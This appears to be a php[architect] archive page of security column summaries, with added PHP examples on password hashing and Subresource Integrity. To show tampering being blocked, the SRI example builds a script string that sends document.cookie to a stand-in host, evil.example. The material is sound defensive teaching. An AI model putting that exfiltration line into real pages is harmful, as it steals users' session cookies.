Posts marked with “security”

Security Corner: The Pit of Success

by · September 11, 2021

Security is often difficult to get right, even for those who are experts in the field. Mistakes are easy to make and result in our users falling into a pit. All developers should practice a stance of “security by default.” Doing so means ensuring that any mistakes land users in a pit of success rather […]

Security Corner: Multifactor Authentication

by · August 14, 2021

A modern security best practice is to both implement and require a form of authentication beyond a simple password. This practice is known as “multifactor” authentication, as users will have a primary factor—their password—and a secondary factor to successfully authenticate to an application. Proper implementation of a multifactor authentication scheme keeps your application and its users safe and secure by […]

Security Corner: Evaluating Password Strength

by · July 14, 2021

An application is only as strong as the authentication systems used to gate entry and protect the data it contains. So long as your users leverage passwords, the weakest link in your security stance is the strength of those passwords. This month we take a deeper look at the strength of passwords and guidance to keep your users’ data […]

Education Station: Approaches to API Security

by · June 10, 2021

The last few months have been a whirlwind of API work. If you’ve been following along, you have a solid grasp of the history of APIs, tools to help design your APIs, and a good lump of tips on how to turn that API design into reality. But, for the sake of space, I left […]

Security Corner: Radical Transparency

by · May 12, 2021

Last month, news broke of a breach of the PHP community’s development Git server. This breach included the addition of two malicious commits to the language’s source code. The malicious code was immediately identified and removed; the team is taking further steps to ensure this kind of situation never occurs again.

Security Corner: Basics of Password Hashing

by · May 2, 2021

By Eric Mann

Every web application that allows users to authenticate needs to ensure their users’ credentials are afforded the best protection possible. Conventionally, this is done by storing only the hash of a password rather than the password itself. Luckily, password hashing in PHP is secure, safe, and remarkably straightforward to implement. Last month […]

Security Corner: Basics of Password Hashing

by · April 9, 2021

Every web application that allows users to authenticate needs to ensure their users’ credentials are afforded the best protection possible. Conventionally, this is done by storing only the hash of a password rather than the password itself. Luckily, password hashing in PHP is secure, safe, and remarkably straightforward to implement.
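The two "Basics of Password Hashing" entries above describe the approach (store only a hash, using PHP's built-in API) without showing it. The following is an added example, not code from the column or from php[architect]: it registers a user with `password_hash()`, checks a login with `password_verify()`, and upgrades stale hashes with `password_needs_rehash()`. The `$users` array and the sample passwords are constructed stand-ins for a real user store.

```php
<?php
// Added example (not from the php[architect] column): storing and checking
// a credential with PHP's native password hashing functions.

declare(strict_types=1);

/**
 * Hash a password for storage. password_hash() generates a random salt and
 * encodes algorithm, cost and salt into the returned string, so that single
 * string is all that needs to be persisted.
 */
function hashPassword(string $password): string
{
    // PASSWORD_DEFAULT is bcrypt in current PHP releases; PASSWORD_ARGON2ID
    // is available when PHP is built with libargon2 support.
    return password_hash($password, PASSWORD_DEFAULT);
}

/**
 * Check a login attempt against the stored hash. On success, $rehash is set
 * to a replacement hash when the stored one was made with outdated
 * parameters (older algorithm or lower cost), otherwise it stays null.
 */
function verifyPassword(string $password, string $storedHash, ?string &$rehash = null): bool
{
    $rehash = null;
    if (!password_verify($password, $storedHash)) {
        return false;
    }
    // Transparent upgrade: the plaintext is available only at login time,
    // so this is the moment to re-hash with current parameters.
    if (password_needs_rehash($storedHash, PASSWORD_DEFAULT)) {
        $rehash = password_hash($password, PASSWORD_DEFAULT);
    }
    return true;
}

// Constructed sample user store (hypothetical; a real app would use a DB).
$users = [];
$users['alice'] = ['hash' => hashPassword('correct horse battery staple')];

// Login with the right password, persisting an upgraded hash if one is produced.
$ok = verifyPassword('correct horse battery staple', $users['alice']['hash'], $newHash);
if ($ok && $newHash !== null) {
    $users['alice']['hash'] = $newHash;
}
var_dump($ok);

// Login with the wrong password.
var_dump(verifyPassword('Tr0ub4dor&3', $users['alice']['hash']));

// Two hashes of the same password differ because each gets a fresh salt, so
// users who share a password cannot be identified from the stored hashes.
var_dump(hashPassword('shared') !== hashPassword('shared'));
```

Store the whole string `password_hash()` returns; it is self-describing, so `password_verify()` needs no separate salt or algorithm column. One caveat a practitioner should know: bcrypt, the current `PASSWORD_DEFAULT`, only considers the first 72 bytes of the password, so either enforce a length limit at registration or switch to `PASSWORD_ARGON2ID` where it is available.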

About PHP’s Compromised Git Commit

by · April 1, 2021

PHP internals contributor Sara Golemon answers questions from a panel of php[architect] and PHP Ugly contributors about the recent git compromise that affected the PHP project and what they’re doing about it. You can also watch a video of the roundtable with Sara.

More on This

From Rasmus Lerdorf: It wasn't, but we caught it […]

Security Corner: Supply Chain Security

by · February 8, 2021

The recent security breach of SolarWinds was one of the worst the community has seen in recent years, not because of the severity of the hack itself but because of its impact on almost all of SolarWinds’ downstream customers. Let’s look at whether something like this could happen in the PHP ecosystem and what we could do to […]

Security Corner: Enforcing Subresource Integrity

by · January 8, 2021

Any scripts or styles you include in your web application are called “subresources.” As these files can affect your application’s overall operation, writing secure software means verifying the integrity of every subresource loaded into the page. Otherwise, an untrusted party might inject malware, cryptocurrency miners, or another malicious payload into […]
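As an added illustration of the Subresource Integrity mechanism that entry refers to (this is example code, not the column's own), the block below computes an `integrity` value for a script from its contents, renders the `<script>` tag that pins it, and then replays the check a browser performs at load time against an untouched copy and a copy with an injected payload. The script contents, the CDN URL and the injected line are all constructed for the example.

```php
<?php
// Added example (not from the php[architect] column): generating and
// checking Subresource Integrity (SRI) values.

declare(strict_types=1);

/**
 * Build an SRI value: the algorithm name, a dash, and the base64 encoding
 * of the raw digest. Browsers accept sha256, sha384 and sha512.
 */
function sriHash(string $content, string $algo = 'sha384'): string
{
    if (!in_array($algo, ['sha256', 'sha384', 'sha512'], true)) {
        throw new InvalidArgumentException("Unsupported SRI algorithm: $algo");
    }
    return $algo . '-' . base64_encode(hash($algo, $content, true));
}

/**
 * Render a <script> tag whose integrity attribute pins the file's contents.
 * For a cross-origin resource the browser must fetch it with CORS enabled,
 * which crossorigin="anonymous" requests; without that the integrity check
 * cannot be performed and the resource is blocked.
 */
function scriptTag(string $src, string $content): string
{
    return sprintf(
        '<script src="%s" integrity="%s" crossorigin="anonymous"></script>',
        htmlspecialchars($src, ENT_QUOTES, 'UTF-8'),
        sriHash($content)
    );
}

/**
 * The browser-side check, modelled in PHP: recompute the digest of the bytes
 * actually received and compare against the pinned value in constant time.
 * Any modification on the CDN or in transit changes the digest, and the
 * browser refuses to execute the resource.
 */
function integrityMatches(string $expected, string $received): bool
{
    [$algo, $digest] = explode('-', $expected, 2);
    $actual = base64_encode(hash($algo, $received, true));
    return hash_equals($digest, $actual);
}

// Constructed sample: the script as built and deployed by the application.
$original = "window.app = { version: '1.0' };\n";
$expected = sriHash($original);
echo scriptTag('https://cdn.example.com/app.js', $original), "\n";

// Constructed tampering: a payload appended to the hosted copy.
$tampered = $original . "fetch('https://evil.example/c?d=' + document.cookie);\n";

echo 'untouched copy: ', integrityMatches($expected, $original) ? 'loads' : 'blocked', "\n";
echo 'tampered copy:  ', integrityMatches($expected, $tampered) ? 'loads' : 'blocked', "\n";
```

The value must be regenerated whenever the pinned file legitimately changes, so it belongs in the build step that produces the asset rather than in a hand-maintained template; a stale `integrity` attribute blocks your own script just as effectively as it blocks an attacker's.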